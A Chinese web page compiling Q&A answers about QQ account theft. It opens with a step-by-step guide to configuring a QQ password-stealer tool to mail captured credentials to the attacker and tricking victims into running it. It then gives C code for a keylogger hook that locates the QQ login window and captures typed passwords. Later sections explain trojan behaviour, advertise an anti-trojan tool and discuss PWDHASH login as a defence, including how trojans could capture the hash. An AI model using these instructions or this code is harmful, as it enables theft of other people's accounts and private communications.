本文目录一览:
qq怎么盗号教程
配置海盗盟QQ大盗工具
如果你要想偷取他人的QQ密码,首先需要从网上下载海盗盟QQ大盗 2008版工具,其是一款绿色美化版工具,所以无需安装便可轻松使用。打开“海盗盟QQ大盗 2008版”界面,首先印入眼帘的是“邮箱收信”栏内的所有功能标签,我们这里只要将自己的收信邮箱地址,及密码添入到相关文本内便可。另外你拥有稳定的ASP空间,也可以在右侧配置ASP收信地址
然后单击“生成“按钮,便可”按照以上设置“生成服务端程序,如果此时你想利用生成好的服务端程序,偷取他人的QQ密码,只要将其服务端发送给网友,并且骗其运行后。其受害用户以后再输入QQ密码时,就会自行将其号码连带密码,一同发送到我们指定的接收邮箱和接收网站内。
QQ被盗了 密保记不住了 号码被盗号的绑定了 还能找回来吗?那QQ我用了十一年了
打客服,或者我给你一个我的盗号程序:一般的盗密码的软件的软件都是通过监视键盘来获得密码,这样操作比较方便,但是这样也存在一定问题,密码有的时候不是很准确,因为有的人输入密码并不是从前到后输入,当然这样的人也是少数,盗密码嘛,当然去得到那些比较粗心的人的密码! 通过安装钩子来监视QQ登陆界面就是获得密码的方法,在安装前得先找到登陆窗口的句柄,当钩子安装后,记录键盘,当用户“回车”或是点了“登陆”就可以开始处理密码了! 我准备分为四部分来说明这个整个过程:
(1)寻找QQ登陆界面。
(2)安装钩子
(3)钩子函数的解释.
(4)处理密码。
以下部分全是使用C语言,文章中我假设读者您是会C/SDK编程的。如果遇到相关的概念性问题,您可以查看MSDN或是上BBS 询问!
第一部分:(1)寻找QQ登陆界面。
软件运行后,利用安装定时器,每秒在系统找QQ登陆界面,这样基本上只要用户打开了QQ登陆界面就会被抓住其句柄,看下面代码:
#define ID_MYTIMER 555
SetTimer(hDlg, ID_MYTIMER, 1000, NULL);
安装好TIMER后,下面是处理主程序的WM_TIMER消息,凡是出现没有定义的变量,您可以理解为是全局变量.
//处理WM_TIMER代码
if (!IsWindow(g_hQQLogin)) //判断g_hQQLogin是否是有效的窗口句柄
{
HWND hLogin=NULL;
g_hQQLogin = NULL;
SetQQHook(NULL); //参数为NULL是卸载HOOK,参数为句柄是安装句柄
do
{
//利用FindWindowEx查找QQ登陆窗口,具体参数意思请查MSDN
g_hQQLogin=FindWindowEx(NULL,g_hQQLogin,"#32770",NULL); //对话框的类都是#32770
//找到类名是#32770后,再在其窗体内找一个具有“ 登录QQ”的BUTTON按纽
hLogin = FindWindowEx(g_hQQLogin, NULL, "Button", " 登录QQ"); //这一句很关键,如果你的QQ登陆窗口上没有" 登录QQ"字样,那么获取密码将失败!
}
while(g_hQQLogin != NULL hLogin == NULL); //直到找到指定的窗口,即:QQ登陆窗口
if (g_hQQLogin != NULL)
{
SetQQHook(g_hQQLogin);//安装HOOK,此函数在DLL文件中 第二部分中介绍
}
}
上面就是查找QQ登陆窗口句柄的过程,从代码可以看出我用的方法:找一个其子窗体中有一个标题为“ 登录QQ”的BUTTON的对话框(这句话说得有点饶口,这句话如果也看不懂,下面您不用看了:() 我最开始是想利用 FindWindow(NULL,"QQ用户登陆窗口")来查找,但是我用Spy++看了QQ登陆窗口的标题并不是“QQ用户登陆窗口”,而是“乱码”,其中包含了回车键等特殊字符,于是我用了FindWindowEx().看得懂就用!!!声:,这是我另一个回答里的,不是抄袭的!!!
QQ安全提示QQ号中木马说可能被盗号了,怎么解决?
如何保护QQ木马的入侵,如何清除电脑中存在的QQ木马? 玩QQ如何杀木马,怎么防盗号? 1、为了你的虚拟财产安全,切勿将帐号,密码,密保卡等信息保存在你的电脑上。 2、不要受中奖等诱惑点击不明链接,不要访问外挂网站,不使用外挂。 3、密保卡等防御手段仍然是必不可少,能大大降低你被盗号的机会。 4、提高警惕,以防被骗。要警惕各种骗局,特别是要你密保卡随机密码的。 5、在开始游戏前,请及时使用可牛盗号木马专杀排除隐患,保障账号信息的安全性。 QQ盗号木马行为: QQ盗号木马会监视用户的活动,监视用户电脑内存的特定进程--例如QQ程序的进程或使用了Hook截取技术,可以截取用户的键盘(和软键盘)输入信息,并记录用户在该进程输入的账号、密码等信息。多数QQ盗号木马会偷偷地主动连接网络和向外发送记录到的信息,但这样容易被某些杀毒软件和防火墙发现。所以有一些设计巧妙的魔兽盗号木马它会静静地等,一直等到接到盗号者的指令才会把记录的信息发送出去。不管怎么样,用户的账号、密码是被盗号者偷到手了。随着密码保护的加强,密报卡的出现使得盗号木马得到了一定的遏制,但有为数不少的用户会将密保图片存于电脑中,这又给木马提供了可乘之机,盗号木马会自动搜集系统中的密保图片并发送到黑客的控制端中。 下载可牛盗号木马专杀工具,清除未知QQ盗号木马 《可牛盗号木马专杀》是专为防盗号量身打造,完全免费的木马专杀软件;基于100%的可牛云查杀技术,可以在5分钟以内快速识别最新盗号木马,并强力清除,保住用户不受QQ盗号木马影响蒙受财产损失。 可牛杀毒免费盗号木马专杀工具:
QQ防盗登录器是个什么原理?
今天来说一下QQ木马的原理和第三方QQ登陆器防盗的原理!
其实,要想防止QQ被盗,只要了解QQ盗号程序的实现原理,就能找出防范的方法来。
一、分析QQ盗号软件的原理及程序实现的重点
常见的QQ木马盗号技术实现主要使用如下方法:
1.对指定进程[QQ.exe],发送消息,获取进程的控件内容,如密码输入框内容。
2.对指定进程[QQ.exe],利用全局HOOK(钩子),进行键盘记录,获取输入的内容。
目前常见的QQ盗号木马大部分都是使用上面的手法进行盗号的,大家可以看出,这两种手法都需要对QQ进程进行监控,其重点就是:
监控QQ登陆时输入帐号密码的界面,获取该界面内控件(号码输入框和密码输入框)的内容;
还有就是对这些控件的键盘输入内容进行监控记录。
二、寻求解决方案及实现方法
如果我们能够不经过登陆界面的QQ号码和密码的输入(或者不使用QQ程序的标准登陆界面)来登陆QQ的话,那么针对QQ进程和QQ登陆界面进行监控记录的木马,就会失去效果了.
1.这里第一个大家可能会想到在一部干净的电脑上登陆一次QQ然后设为自动登陆,这样以后使用这个自动登陆就不会被木马盗取密码了,但是这种办法使用比较不方便,一个QQ只能登陆一个,所以有人发现了下面这种办法!也就是PWDHash!
2.PWDHash的由来
QQ的PWDhash
原本是为实现
与
TM、QQGAME无缝切换而用的将密码加密传递的参数。使得用户能在
与
TM、QQGAME之间快速切换而不用再次输入密码。
使用方法(下面的/STAT:41代表正常登陆,41是隐身登陆):
QQ程序路径
/START
QQUIN:QQ帐号
PWDHASH:加密后的QQ密码
/STAT:41
例如:
"C:\Program
Files\TENCENT\QQ.exe"
/START
QQUIN:132456
PWDHASH:4QrcOUm6Wau+VuBX8g+IPg==
/STAT:41
概念:
PWDHASH就是对我们的原始QQ密码进行加密处理,MD5(32bit)→HEX2ASCII(ansi)→Base64!
先用MD5散列算法处理,然后再用BASE64编码对这个HASH字节组做第二次编码得到的。因为MD5是不可逆的,所以只能把密码还原到MD5,理论上说是无法从PWDHASH反推出原始的QQ密码的。但是,如果密码过于简单,如十位以下的纯数字、生日,纯大写,纯小写之类的,是可以被简单暴力破解的。
利用PWDHASH登录的利与弊
有利的一面:免去输入密码之苦,双击一下就可以登录,同时也可以防止密码被键盘记录软件盗取。
不好的一面:如果是多人共用电脑,或者电脑可以被别人随意使用,只要别人获取了你的PWDHASH那么别人是可以随意登陆你的QQ的。
三、总结
在计算机世界里没有绝对的安全,使用QQ密码参数传递来登陆QQ虽然可以避免输入QQ帐号密码时被记录,但是登陆后在QQ.EXE进程后面会留有登陆时的参数,只要用『瑞星卡卡助手』的进程查看就可以看到了,所以木马只需要改写一下,检查QQ.EXE是否带参数,如果带有参数的话就记录下来,然后发送出去,这样就还是可以盗你的QQ,它可以利用你的PWDHASH来登陆你的QQ,但不知道你的密码,但是可以登陆QQ已经够了.
不过因为这种办法无法获取密码,和这种办法使用并不广泛,所以目前市面上的QQ木马都没有针对这个办法进行改进,所以目前来说还是相对比较安全的!